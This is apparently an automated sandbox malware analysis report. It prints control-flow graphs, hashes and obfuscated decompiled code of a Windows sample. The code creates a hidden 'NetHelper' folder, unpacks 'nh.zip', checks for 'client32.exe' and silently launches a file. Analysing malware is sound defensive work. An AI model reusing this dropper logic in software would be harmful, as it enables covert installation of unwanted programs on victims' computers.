                                                                                                                              control_flow_graph 1230 96c8f0-96c920 1231 96c922 1230->1231 1232 96c980-96c985 1230->1232 1235 96c937-96c93c 1231->1235 1233 96ca30-96ca35 1232->1233 1234 96c98b-96c990 1232->1234 1238 96cb5c-96cb61 1233->1238 1239 96ca3b-96ca40 1233->1239 1240 96c996-96c99b 1234->1240 1241 96ca83-96ca88 1234->1241 1236 96c942-96c947 1235->1236 1237 96c9e0-96c9e5 1235->1237 1244 96cace-96cad3 1236->1244 1245 96c94d-96c952 1236->1245 1242 96cb1f-96cb24 1237->1242 1243 96c9eb-96c9f0 1237->1243 1252 96cb67-96cb6c 1238->1252 1253 96ce8e-96ce9a 1238->1253 1246 96ca46-96ca4b 1239->1246 1247 96cc7a-96cc7f 1239->1247 1248 96c9a1-96c9a6 1240->1248 1249 96cbd8-96cbdd 1240->1249 1250 96ccb2-96ccb7 1241->1250 1251 96ca8e-96ca93 1241->1251 1266 96ce43-96ce68 1242->1266 1267 96cb2a-96cb2f 1242->1267 1254 96c9f6-96c9fb 1243->1254 1255 96cc29-96cc2e 1243->1255 1260 96cced-96ccf2 1244->1260 1261 96cad9-96cade 1244->1261 1258 96cba1-96cba6 1245->1258 1259 96c958-96c95d 1245->1259 1264 96cde2-96ce19 CreateDirectoryW 1246->1264 1265 96ca51-96ca56 1246->1265 1256 96cc85-96cc8a 1247->1256 1257 96cf61-96cf8e 1247->1257 1272 96cd64-96cd8f 1248->1272 1273 96c9ac-96c9b1 1248->1273 1268 96cbe3-96cbe8 1249->1268 1269 96cefb-96cf26 1249->1269 1270 96c924-96c929 1250->1270 1271 96ccbd-96ccc2 1250->1271 1274 96cee6-96cef0 1251->1274 1275 96ca99-96ca9e 1251->1275 1276 96cb72-96cb77 1252->1276 1277 96ceb8-96cec6 1252->1277 1262 96cea1 1253->1262 1263 96ce9c 1253->1263 1281 96ca01-96ca06 1254->1281 1282 96cd9f-96cdd7 call 9710e0 call 96c8f0 1254->1282 1294 96cc34-96cc39 1255->1294 1295 96cf43-96cf56 CreateDirectoryW 1255->1295 1279 96c930-96c935 1256->1279 1298 96cc90-96cc9a call 972f88 1256->1298 1288 96cf95-96cf9d 1257->1288 1289 96cf90 1257->1289 1285 96ced1-96cee0 GetFileAttributesW 1258->1285 1286 96cbac-96cbb1 1258->1286 1299 96c963-96c968 1259->1299 1300 96cd08-96cd36 1259->1300 1309 96cfb4-96cfe5 1260->1309 1310 96ccf8-96ccfd 1260->1310 1301 96cae4-96cae9 1261->1301 1302 96ce2e-96ce38 1261->1302 1303 96cea5-96cead 1262->1303 1263->1262 1292 96ce20 1264->1292 1293 96ce1b 1264->1293 1265->1279 1290 96ca5c-96ca68 1265->1290 1266->1279 1297 96ce6e-96ce78 1266->1297 1304 96cb35-96cb3a 1267->1304 1305 96ce83-96ce8c 1267->1305 1268->1279 1291 96cbee-96cc19 1268->1291 1283 96cf2d-96cf38 1269->1283 1284 96cf28 1269->1284 1270->1279 1271->1279 1306 96ccc8-96cce2 1271->1306 1272->1283 1287 96cd95-96cd9a 1272->1287 1273->1279 1307 96c9b7-96c9c2 1273->1307 1274->1232 1278 96cef6 1274->1278 1275->1279 1296 96caa4-96cac3 call 972f57 GetFileAttributesW 1275->1296 1276->1279 1280 96cb7d-96cb86 1276->1280 1277->1232 1308 96cecc 1277->1308 1278->1235 1279->1232 1279->1235 1280->1279 1311 96cb8c-96cb96 1280->1311 1281->1279 1327 96ca0c-96ca1e 1281->1327 1282->1232 1363 96cddd 1282->1363 1283->1279 1312 96cf3e 1283->1312 1284->1283 1285->1274 1285->1279 1286->1279 1313 96cbb7-96cbbd CreateDirectoryW 1286->1313 1287->1283 1315 96cfa1-96cfa9 1288->1315 1289->1288 1290->1279 1329 96ca6e-96ca78 1290->1329 1316 96cc1f-96cc24 1291->1316 1317 96cfec-96cff7 1291->1317 1330 96ce23-96ce29 1292->1330 1293->1292 1294->1279 1319 96cc3f-96cc6c 1294->1319 1295->1232 1314 96cf5c 1295->1314 1296->1279 1359 96cac9 1296->1359 1297->1232 1333 96ce7e 1297->1333 1357 96cc9d-96cca7 1298->1357 1299->1279 1321 96c96a-96c974 1299->1321 1325 96cd3d-96cd59 1300->1325 1326 96cd38 1300->1326 1301->1279 1334 96caef-96cb14 1301->1334 1302->1232 1332 96ce3e 1302->1332 1303->1232 1335 96ceb3 1303->1335 1304->1279 1336 96cb40-96cb51 1304->1336 1305->1303 1306->1232 1322 96cce8 1306->1322 1307->1279 1323 96c9c8-96c9d2 1307->1323 1308->1285 1309->1317 1318 96cfe7 1309->1318 1310->1279 1324 96cd03-96d027 call 96fb8d 1310->1324 1311->1232 1337 96cb9c 1311->1337 1338 96cffd-96d004 1312->1338 1339 96cbc3-96cbcd 1313->1339 1314->1235 1315->1232 1340 96cfaf 1315->1340 1316->1317 1317->1279 1317->1338 1318->1317 1341 96cc73-96cc75 1319->1341 1342 96cc6e 1319->1342 1321->1235 1344 96c976 1321->1344 1322->1235 1323->1232 1345 96c9d4 1323->1345 1325->1232 1347 96cd5f 1325->1347 1326->1325 1327->1232 1348 96ca24 1327->1348 1329->1232 1350 96ca7e 1329->1350 1330->1315 1332->1235 1333->1235 1334->1279 1352 96cb1a 1334->1352 1335->1277 1336->1279 1353 96cb57 1336->1353 1337->1235 1338->1232 1355 96d00a 1338->1355 1339->1232 1354 96cbd3 1339->1354 1340->1235 1341->1330 1342->1341 1344->1232 1345->1235 1347->1235 1348->1235 1350->1235 1352->1357 1353->1274 1354->1235 1355->1235 1357->1232 1361 96ccad 1357->1361 1359->1339 1361->1235 1363->1235
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ef8806fc946259fa4176a750c43c2a176f554d5e3361444391a0d15c7febf91a
                                                                                                                              • Instruction ID: 7778825dfdd1d3213673e5adae43150fb87ac5c2a7c89313fb9de63c6fdcb61a
                                                                                                                              • Opcode Fuzzy Hash: ef8806fc946259fa4176a750c43c2a176f554d5e3361444391a0d15c7febf91a
                                                                                                                              • Instruction Fuzzy Hash: 87E15AB51193818BCF24DA2885C4A3EB6EAAF99324F744D1AF4D9DB3A0D335DC819743
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00971D01 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1490 971d01-971d0e call 9761ba 1493 971d30-971d3c call 971cae ExitProcess 1490->1493 1494 971d10-971d1e GetPEB 1490->1494 1494->1493 1495 971d20-971d2a GetCurrentProcess TerminateProcess 1494->1495 1495->1493
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00971DB9,?,?,?,?,?,0097844E), ref: 00971D23
                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00971DB9,?,?,?,?,?,0097844E), ref: 00971D2A
                                                                                                                              • ExitProcess.KERNEL32 ref: 00971D3C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1703294689-0
                                                                                                                              • Opcode ID: bd5e4658e9dfb4f20786b9afdb0188d3b29bd3bffbe6a313ba9babde6f6f2c12
                                                                                                                              • Instruction ID: ec1b45c9d9029e10338e3978c147cfe4dc31bb7c3cc2cdd8c6ab7b8e610f705f
                                                                                                                              • Opcode Fuzzy Hash: bd5e4658e9dfb4f20786b9afdb0188d3b29bd3bffbe6a313ba9babde6f6f2c12
                                                                                                                              • Instruction Fuzzy Hash: 7AE0EC32024548EFCF226F58DD0DA493F6DEB94381F458414F8098A672DB75ED82DB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00968A10 Relevance: 4.3, Strings: 3, Instructions: 522COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1498 968a10-968a70 1499 968a80-968a88 1498->1499 1500 968b20-968b25 1499->1500 1501 968a8e-968a93 1499->1501 1502 968c80-968c85 1500->1502 1503 968b2b-968b30 1500->1503 1504 968bb0-968bb5 1501->1504 1505 968a99-968a9e 1501->1505 1510 968d4f-968d54 1502->1510 1511 968c8b-968c90 1502->1511 1506 968b36-968b3b 1503->1506 1507 968ce3-968ce8 1503->1507 1508 968d27-968d2c 1504->1508 1509 968bbb-968bc0 1504->1509 1512 968aa4-968aa9 1505->1512 1513 968cbb-968cc0 1505->1513 1516 968db6-968dbb 1506->1516 1517 968b41-968b46 1506->1517 1518 968e61-968e66 1507->1518 1519 968cee-968cf3 1507->1519 1522 968d32-968d37 1508->1522 1523 968ebb-968ec0 1508->1523 1520 968bc6-968bcf 1509->1520 1521 968dd8-968ddd 1509->1521 1528 968f0a-968f0f 1510->1528 1529 968d5a-968d5f 1510->1529 1524 968c96-968c9b 1511->1524 1525 968e0c-968e11 1511->1525 1526 968aaf-968ab4 1512->1526 1527 968d88-968d8d 1512->1527 1514 968cc6-968ccb 1513->1514 1515 968e33-968e38 1513->1515 1532 968cd1-968cd8 1514->1532 1533 968f5d-968fd1 call 960d20 1514->1533 1530 968e3e-968e45 1515->1530 1531 96919b-9691cd call 960d20 1515->1531 1552 969142-969154 1516->1552 1553 968dc1-968dc8 1516->1553 1548 968f2c-968f36 1517->1548 1549 968b4c-968b53 1517->1549 1534 9691d2-9691ff call 967980 1518->1534 1535 968e6c-968e73 1518->1535 1536 968fd6-968fdb call 972cb7 1519->1536 1537 968cf9-968d00 1519->1537 1520->1499 1554 968bd5-968bdc 1520->1554 1555 968de3-968dea 1521->1555 1556 969159-969196 1521->1556 1540 96901f-969072 1522->1540 1541 968d3d-968d44 1522->1541 1538 968ec6-968ecd 1523->1538 1539 969204-96922f call 972cb7 1523->1539 1557 968ca1-968ca8 1524->1557 1558 968f3b-968f4b 1524->1558 1559 968e17-968e1e 1525->1559 1560 968a72-968a7c 1525->1560 1544 968aba-968ac1 1526->1544 1545 969248-969260 call 96fb8d 1526->1545 1550 968d93-968d9a 1527->1550 1551 969128-96913d 1527->1551 1542 969234-969243 1528->1542 1543 968f15-968f1c 1528->1543 1546 969077-969123 1529->1546 1547 968d65-968d6c 1529->1547 1530->1499 1561 968e4b-968e5c call 972c9c 1530->1561 1531->1499 1532->1499 1574 968cde 1532->1574 1533->1499 1534->1499 1535->1499 1562 968e79-968eb6 1535->1562 1590 968fe0-96901a 1536->1590 1537->1499 1576 968d06-968d22 1537->1576 1538->1499 1563 968ed3-968f05 1538->1563 1539->1499 1540->1499 1541->1499 1578 968d4a 1541->1578 1542->1499 1543->1499 1564 968f22-968f27 1543->1564 1544->1499 1565 968ac3-968b0d 1544->1565 1546->1499 1547->1499 1579 968d72-968d83 call 965990 1547->1579 1548->1499 1549->1499 1569 968b59-968ba3 1549->1569 1550->1499 1580 968da0-968db1 1550->1580 1551->1499 1552->1499 1553->1499 1581 968dce-968dd3 1553->1581 1554->1499 1570 968be2-968c70 1554->1570 1555->1499 1582 968df0-968df4 1555->1582 1556->1499 1557->1499 1572 968cae-968cb6 1557->1572 1566 968f50-968f58 1558->1566 1559->1499 1583 968e24-968e2e 1559->1583 1560->1499 1561->1499 1562->1499 1563->1499 1564->1499 1565->1499 1566->1499 1569->1499 1570->1499 1591 968df8-968e07 1572->1591 1574->1583 1576->1499 1578->1510 1579->1499 1580->1566 1581->1499 1582->1591 1583->1499 1590->1499 1591->1499
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 78B$88B$88B
                                                                                                                              • API String ID: 0-1637753349
                                                                                                                              • Opcode ID: a3a631cc5b27417a780ee8b387c7dcc093806cd879325b5cda4f734a902caa11
                                                                                                                              • Instruction ID: 93c5a76dfe5e20a91b80d9b6d52577faa48bb0d07b4965c6b92ef26e2175738b
                                                                                                                              • Opcode Fuzzy Hash: a3a631cc5b27417a780ee8b387c7dcc093806cd879325b5cda4f734a902caa11
                                                                                                                              • Instruction Fuzzy Hash: 541296752093418FCB18CF58C490A2FB7E1BBD9314F694A2EE856CB3A1DB35DC458B92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0097046A Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00020591,0096FEED), ref: 0097046F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 9eb55d1baad56f6aeb5238004dcb9dba444bba2e2c706cb8bbcf5d9af82b7c08
                                                                                                                              • Instruction ID: 35533f693bbf2035f6f42a605e568fda9cd51386d2d0ef99bb5c9447230c80a7
                                                                                                                              • Opcode Fuzzy Hash: 9eb55d1baad56f6aeb5238004dcb9dba444bba2e2c706cb8bbcf5d9af82b7c08
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00951AE0 Relevance: 56.6, APIs: 20, Strings: 12, Instructions: 555fileCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 951ae0-951b34 call 96fba0 SHGetSpecialFolderPathW 3 951b36 0->3 4 951bac-951bb2 0->4 7 952080-952086 3->7 5 951bb4-951bba 4->5 6 951c30-951c36 4->6 8 951c76-951c7c 5->8 9 951bc0-951bc6 5->9 12 951cd1-951cd7 6->12 13 951c3c-951c42 6->13 10 9520e0-9520e6 7->10 11 952088-95208e 7->11 14 951e57-951f05 call 972c33 call 972cc2 call 972cd4 * 3 wsprintfW CreateDirectoryW 8->14 15 951c82-951c88 8->15 16 951bcc-951bd2 9->16 17 951d1b-951d21 9->17 22 95225c-952262 10->22 23 9520ec-9520f2 10->23 18 952094-95209a 11->18 19 95218a-952190 11->19 20 951f24-951f45 12->20 21 951cdd-951ce3 12->21 24 951d70-951d76 13->24 25 951c48-951c4e 13->25 97 952062-95206b 14->97 26 951c8e-951c94 15->26 27 951f0a 15->27 30 951df9-951e08 16->30 31 951bd8-951bde 16->31 38 951d27-951d2d 17->38 39 95201e-95202d 17->39 32 9522a4-9522aa 18->32 33 9520a0-9520a6 18->33 28 952324-95233c 19->28 29 952196-95219c 19->29 20->4 34 951f4b 20->34 35 951f50-952016 wsprintfW * 2 call 952750 lstrcmpW 21->35 36 951ce9-951cef 21->36 40 952392-9523cf call 951840 ShellExecuteW 22->40 41 952268-95226e 22->41 42 9522e3-9522e9 23->42 43 9520f8-9520fe 23->43 46 952035-95205a 24->46 47 951d7c-951d82 24->47 44 951c54-951c5a 25->44 45 951e0d-951e4c 25->45 49 951ba0-951ba6 26->49 66 951c9a-951ccc call 951840 ShellExecuteW 26->66 67 951f0e-951f19 27->67 28->4 60 952342 28->60 68 952347-952364 29->68 69 9521a2-9521a8 29->69 55 952434-95243d 30->55 31->49 56 951be0-951c26 wsprintfW call 952750 31->56 51 9522b0-9522b6 32->51 52 9523fd-952408 32->52 57 9520ac-9520b2 33->57 58 951b3b-951b9c wsprintfW * 2 call 952750 lstrcmpW 33->58 34->7 35->4 112 95201c 35->112 36->49 70 951cf5-951d10 36->70 38->49 72 951d33-951d6b SetFileAttributesW lstrlenW lstrcmpW 38->72 39->4 75 952033 39->75 40->4 108 9523d5 40->108 73 952274-95227a 41->73 74 9523da-9523f2 41->74 53 952413-95242f call 96f400 42->53 54 9522ef-9522f5 42->54 62 952104-95210a 43->62 63 952300-952319 lstrcpyW 43->63 44->49 65 951c60-951c6b 44->65 45->4 59 951e52 45->59 46->4 48 952060 46->48 47->49 50 951d88-951dee call 96f420 call 971660 47->50 48->7 49->4 49->7 50->4 124 951df4 50->124 51->49 77 9522bc-9522de 51->77 52->4 84 95240e 52->84 53->55 54->49 78 9522fb-952464 call 96fb8d 54->78 55->4 87 952443 55->87 56->97 57->49 91 9520b8-9520cd DeleteFileW 57->91 58->49 59->7 60->7 62->49 92 952110-952180 call 96f420 wsprintfW call 96f870 lstrcmpW 62->92 63->4 79 95231f 63->79 65->4 93 951c71 65->93 66->67 67->4 86 951f1f 67->86 80 952369-952387 68->80 69->49 95 9521ae-952251 call 971660 69->95 70->4 96 951d16 70->96 72->97 73->49 98 952280-952299 lstrcpyW 73->98 74->4 83 9523f8 74->83 75->7 77->80 79->7 80->4 105 95238d 80->105 83->7 84->7 86->7 87->7 91->4 104 9520d3 91->104 92->19 93->7 95->4 122 952257 95->122 96->7 97->4 101 952071-95207b 97->101 98->4 113 95229f 98->113 101->7 104->7 105->7 108->7 112->7 113->7 122->7 124->7
                                                                                                                              C-Code - Quality: 52%
                                                                                                                              			E00951AE0(signed int __edx, signed int _a4, char* _a8, char _a12, WCHAR* _a16, WCHAR* _a20, WCHAR* _a24, WCHAR* _a28, char* _a32, short* _a36, short* _a40, WCHAR* _a44, void* _a48, WCHAR* _a52, WCHAR* _a56, char _a59, WCHAR* _a60, signed int _a64, intOrPtr _a68, char _a75, char _a78, char _a592, char _a1634, char _a2156, char _a2208, char _a2730, char _a3252, char _a3256, char _a3814, char _a4336, char _a4874, signed int _a5380, signed int _a5396, WCHAR* _a5404, intOrPtr _a5408, intOrPtr _a5412) {
				WCHAR* _v0;
				WCHAR* _v4;
				WCHAR* _v8;
				char* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				WCHAR* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t174;
				signed int _t176;
				WCHAR* _t179;
				WCHAR* _t182;
				signed int _t187;
				signed int _t198;
				signed int _t203;
				signed int _t208;
				signed int _t215;
				signed int _t218;
				WCHAR* _t219;
				signed int _t222;
				WCHAR* _t224;
				signed int _t233;
				WCHAR* _t239;
				WCHAR* _t241;
				signed int _t246;
				signed char _t247;
				short* _t251;
				WCHAR* _t254;
				WCHAR* _t270;
				signed int _t273;
				signed int _t275;
				void* _t277;
				signed int _t279;
				void* _t281;
				signed int _t285;
				WCHAR* _t291;
				intOrPtr _t294;
				signed int _t301;
				signed int _t312;
				signed int _t319;
				WCHAR* _t337;
				signed int _t342;
				WCHAR* _t348;
				signed int _t350;
				void* _t353;
				void* _t356;

				_t319 = __edx;
				E0096FBA0(0x1528);
				_t174 =  *0x984000; // 0xd51acdcc
				_a5396 = _t174 ^ _t350;
				_t176 =  &_a4874;
				_v8 = _t176;
				_v4 = _t176;
				__imp__SHGetSpecialFolderPathW(0, _v4, 0x1a, 0); // executed
				_t277 = wsprintfW;
				_t279 = 0xa89725a8;
				_v16 = _t176;
				if(0xa89725a8 <= 0xfdb16206) {
					goto L4;
				} else {
					L49:
					while(_t279 > 0x363e9521) {
						if(_t279 <= 0x4613d1a5) {
							__eflags = _t279 - 0x363e9522;
							if(_t279 == 0x363e9522) {
								__eflags = _a59;
								_t279 =  !=  ? 0xae3ec6c : 0xeaa2e9c4;
								__eflags = 0xeaa2e9c4 - 0xfdb16206;
								if(0xeaa2e9c4 <= 0xfdb16206) {
									goto L4;
								} else {
									continue;
								}
								goto L93;
							} else {
								__eflags = _t279 - 0x41d9b140;
								if(_t279 == 0x41d9b140) {
									_t246 =  *0x984928; // 0x0
									_t336 = 0xdc2694a9;
									_t341 = 0x4613d1a6;
									_t154 = _t246 - 1; // -1
									__eflags = ( !(_t154 * _t246) | 0xfffffffe) - 0xffffffff;
									_t291 = 0x4613d1a6;
									goto L82;
								} else {
									__eflags = _t279 - 0x432148e3;
									if(_t279 != 0x432148e3) {
										goto L3;
									} else {
										asm("movsd xmm1, [0x97c034]");
										asm("movsd xmm2, [0x97c02c]");
										_t294 =  *0x97c044; // 0x980808
										asm("movsd xmm0, [0x97c03c]");
										_a32 =  &_a2156;
										asm("movsd [eax+0x20], xmm1");
										asm("movsd xmm1, [0x97c024]");
										asm("movsd [eax+0x18], xmm2");
										asm("movsd xmm2, [0x97c01c]");
										 *((intOrPtr*)(_a32 + 0x30)) = _t294;
										asm("movsd [eax+0x28], xmm0");
										asm("movsd [eax+0x10], xmm1");
										asm("movsd xmm1, [0x97c014]");
										asm("movsd [eax+0x8], xmm2");
										asm("movsd [eax], xmm1");
										_t251 =  &_a1634;
										_a36 = _t251;
										_a40 = _t251;
										E00971660(_t336, _a40, 0, 0x105);
										_t350 = _t350 + 0xc;
										_t279 = 0xd9a3f059;
										 *_t350 = 0;
										__eflags = 0xd9a3f059 - 0xfdb16206;
										if(0xd9a3f059 <= 0xfdb16206) {
											goto L4;
										} else {
											continue;
										}
									}
								}
							}
							goto L75;
						} else {
							if(_t279 > 0x73cc2de3) {
								__eflags = _t279 - 0x73cc2de4;
								if(_t279 == 0x73cc2de4) {
									_t279 = 0xae558bd8;
									__eflags = 0xae558bd8 - 0xfdb16206;
									if(0xae558bd8 <= 0xfdb16206) {
										goto L4;
									} else {
										continue;
									}
									goto L93;
								} else {
									__eflags = _t279 - 0x7cdbe513;
									if(_t279 != 0x7cdbe513) {
										goto L3;
									} else {
										_t246 =  *0x984928; // 0x0
										_t336 = 0xecda8d13;
										_t341 = 0xee84e27c;
										_t150 = _t246 - 1; // -1
										__eflags = ( !(_t150 * _t246) | 0xfffffffe) - 0xffffffff;
										_t291 = 0xee84e27c;
										L82:
										_t247 = _t246 & 0xffffff00 | __eflags == 0x00000000;
										_t292 =  ==  ? _t336 : _t291;
										__eflags =  *0x98492c - 0xa;
										_t293 =  >=  ? _t341 :  ==  ? _t336 : _t291;
										_t319 = (_t319 & 0xffffff00 |  *0x98492c - 0x0000000a < 0x00000000) ^ _t247;
										_t279 =  !=  ? _t336 :  >=  ? _t341 :  ==  ? _t336 : _t291;
										__eflags = _t279 - 0xfdb16206;
										if(_t279 <= 0xfdb16206) {
											goto L4;
										} else {
											continue;
										}
										goto L93;
									}
								}
								L75:
								__eflags = _t279 - 0x158583f6;
								if(_t279 != 0x158583f6) {
									goto L3;
								}
								goto L93;
							} else {
								if(_t279 == 0x4613d1a6) {
									_t341 = _a64;
									_t254 =  &_a592;
									_t336 = _t254;
									wsprintfW(_t254, L"%s%s", _a5404,  *((intOrPtr*)(_t350 + 0x88c + _t341 * 4)));
									_t356 = _t350 + 0x10;
									_t348 =  &_a78;
									wsprintfW(_t348, L"%s\\%s", _v0,  *((intOrPtr*)(_t356 + 0x88c + _t341 * 4)));
									_push(_t348);
									_push(_t254);
									E00952750(_t319);
									_t350 = _t356 + 0x18;
									lstrcmpW( *(_t350 + 0x890 + _t341 * 4), L"client32.exe");
									_t279 = 0xdc2694a9;
									goto L3;
								} else {
									if(_t279 != 0x69ddf2a4) {
										L3:
										__eflags = _t279 - 0xfdb16206;
										if(_t279 <= 0xfdb16206) {
											goto L4;
										}
									} else {
										DeleteFileW(_v0); // executed
										_t279 = 0x9e3c28fc;
										if(0x9e3c28fc <= 0xfdb16206) {
											while(1) {
												L4:
												__eflags = _t279 - 0xd9a3f058;
												if(_t279 > 0xd9a3f058) {
													break;
												}
												__eflags = _t279 - 0xa89725a7;
												if(_t279 <= 0xa89725a7) {
													__eflags = _t279 - 0x9a5cd5d6;
													if(_t279 == 0x9a5cd5d6) {
														E00972CC2(_t279, E00972C33(_t279, _t319, 0));
														_v12 =  &_a4336;
														_t198 = E00972CD4(_t279, __eflags);
														_t203 = E00972CD4(_t279, __eflags);
														_t208 = E00972CD4(_t279, __eflags);
														_v8 =  &_a4336;
														wsprintfW(_v8, L"%s\\NetHelper_v_4.%d.%d.%d", _v20, _t208 - (_t208 * 0x66666667 >> 0x20 >> 2) + (_t208 * 0x66666667 >> 0x20 >> 0x1f) + (_t208 * 0x66666667 >> 0x20 >> 2) + (_t208 * 0x66666667 >> 0x20 >> 0x1f) + ((_t208 * 0x66666667 >> 0x20 >> 2) + (_t208 * 0x66666667 >> 0x20 >> 0x1f) + (_t208 * 0x66666667 >> 0x20 >> 2) + (_t208 * 0x66666667 >> 0x20 >> 0x1f)) * 4, _t203 - (_t203 * 0x66666667 >> 0x20 >> 2) + (_t203 * 0x66666667 >> 0x20 >> 0x1f) + (_t203 * 0x66666667 >> 0x20 >> 2) + (_t203 * 0x66666667 >> 0x20 >> 0x1f) + ((_t203 * 0x66666667 >> 0x20 >> 2) + (_t203 * 0x66666667 >> 0x20 >> 0x1f) + (_t203 * 0x66666667 >> 0x20 >> 2) + (_t203 * 0x66666667 >> 0x20 >> 0x1f)) * 4, _t198 - ((_t198 * 0x66666667 >> 0x20 >> 3) + (_t198 * 0x66666667 >> 0x20 >> 0x1f) << 2) + ((_t198 * 0x66666667 >> 0x20 >> 3) + (_t198 * 0x66666667 >> 0x20 >> 0x1f) << 2) * 4);
														_t350 = _t350 + 0x20;
														_t215 = CreateDirectoryW(_v0, 0); // executed
														__eflags = _t215;
														_t285 = 0xd35519a3;
														_t319 = 0xae558bd8;
														goto L47;
													} else {
														__eflags = _t279 - 0x9e3c28fc;
														if(_t279 == 0x9e3c28fc) {
															goto L37;
														} else {
															__eflags = _t279 - 0xa3f5717f;
															if(_t279 != 0xa3f5717f) {
																goto L3;
															} else {
																E00951840(_a40, _a5408);
																_t350 = _t350 + 8;
																ShellExecuteW(0, L"open", _a40, 0, 0, 2);
																L37:
																_t279 = 0x7cdbe513;
																__eflags = 0x7cdbe513 - 0xfdb16206;
																if(0x7cdbe513 <= 0xfdb16206) {
																	continue;
																} else {
																}
															}
														}
													}
												} else {
													__eflags = _t279 - 0xae558bd7;
													if(_t279 > 0xae558bd7) {
														__eflags = _t279 - 0xae558bd8;
														if(_t279 == 0xae558bd8) {
															_t279 = 0x158583f6;
															__eflags = 0x158583f6 - 0xfdb16206;
															if(0x158583f6 <= 0xfdb16206) {
																continue;
															} else {
															}
														} else {
															__eflags = _t279 - 0xd35519a3;
															if(_t279 != 0xd35519a3) {
																goto L3;
															} else {
																SetFileAttributesW(_v8, 2); // executed
																_t224 = _a5404;
																_t341 = _t224;
																__eflags = lstrcmpW(_t224 + lstrlenW(_t224) * 2 - 8, L".zip");
																_t285 = 0x432148e3;
																_t319 = 0xacef8fbc;
																goto L47;
															}
														}
													} else {
														__eflags = _t279 - 0xa89725a8;
														if(_t279 == 0xa89725a8) {
															__eflags = _v16;
															_t281 = 0x9a5cd5d6;
															_t218 = 0x158583f6;
															L91:
															_t279 =  ==  ? _t218 : _t281;
															__eflags = _t279 - 0xfdb16206;
															if(_t279 <= 0xfdb16206) {
																continue;
															} else {
																goto L49;
															}
															L93:
															__eflags = _a5380 ^ _t350;
															return E0096FB8D(_v24, _t277, _a5380 ^ _t350, _t319, _t336, _t341);
														} else {
															__eflags = _t279 - 0xacef8fbc;
															if(_t279 != 0xacef8fbc) {
																goto L3;
															} else {
																_t219 =  &_a3814;
																_v4 = _t219;
																_v0 = _t219;
																wsprintfW(_v0, L"%s\\nh.zip", _v8);
																_push(_a8);
																_push(_a5412);
																_t222 = E00952750(_t319);
																_t350 = _t350 + 0x14;
																__eflags = _t222;
																_t285 = 0x1d20d6e7;
																_t319 = 0x9e3c28fc;
																L47:
																_t279 =  ==  ? _t319 : _t285;
																__eflags = _t279 - 0xfdb16206;
																if(_t279 <= 0xfdb16206) {
																	continue;
																} else {
																	asm("o16 nop [cs:eax+eax]");
																}
															}
														}
													}
												}
												goto L49;
											}
											__eflags = _t279 - 0xecda8d12;
											if(_t279 <= 0xecda8d12) {
												__eflags = _t279 - 0xd9a3f059;
												if(_t279 == 0xd9a3f059) {
													_t319 = 0x41d9b140;
													_a64 =  *_t350;
													__eflags = _a64 - 0xd;
													_t279 =  <  ? 0x41d9b140 : 0xa3f5717f;
													__eflags = 0xa3f5717f - 0xfdb16206;
													if(0xa3f5717f <= 0xfdb16206) {
														goto L4;
													} else {
													}
												} else {
													__eflags = _t279 - 0xdc2694a9;
													if(_t279 == 0xdc2694a9) {
														_t179 =  &_a592;
														_a44 = _t179;
														_t337 = _t179;
														_t342 = _a64;
														wsprintfW(_t337, L"%s%s", _a5404,  *((intOrPtr*)(_t350 + 0x88c + _t342 * 4)));
														_t353 = _t350 + 0x10;
														_t182 =  &_a78;
														_a56 = _t182;
														_a60 = _t182;
